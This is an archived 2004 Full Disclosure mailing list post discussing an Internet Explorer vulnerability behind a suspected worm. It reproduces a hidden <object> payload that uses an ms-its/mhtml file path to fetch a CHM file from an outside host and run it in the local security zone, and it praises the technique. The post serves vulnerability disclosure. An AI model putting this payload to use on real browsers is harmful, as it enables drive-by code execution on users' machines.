Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: New worm?
From: "http-equiv () excite com" <1 () malware com>
Date: Mon, 29 Mar 2004 01:37:16 -0000


GET / HTTP/1.1 
HTTP/1.1 200 OK 
Server: My Bitchin' IE Infector 
Date: Sat Mar 27 13:22:27 2004 
Content-type: text/html 
Accept-Encoding: identity 
Accept-ranges: bytes 

<<snip content>> 


<<reinsert content>> 

<object data="ms-its:mhtml:file://C:foo.mhtml!
http://www.malware.com//foo.chm::/foo.html"; type="text/x-
scriptlet" style="visibility:hidden">

This is brilliant. Simplicity at it's best. While the original 
is not particularly robust the above container should remedy 
that. In typical fashion Internet Explorer and it's 'masters' 
can simply be fooled into thinking they are in the 'local zone' 
via a non-existent file on the drive. Quite trivial to achieve 
and at the same time absolutely brilliant. This is all quite 
reminiscent of the Ibiza Trojan from beginning February 2004 
which would make this unpatched problem well over one month now.

Fully functional working demo, harmless .exe which over-writes 
notepad.exe, the 'guts' of this particular demo which will be 
flagged by any competent anti-virus suite should not be 
considered the solution. The manufacturer of this particular 
product that allows for all of this should be the one to address 
it - once and for all - at the core level:


End Call


Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
  • Re: New worm? http-equiv () excite com (Mar 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]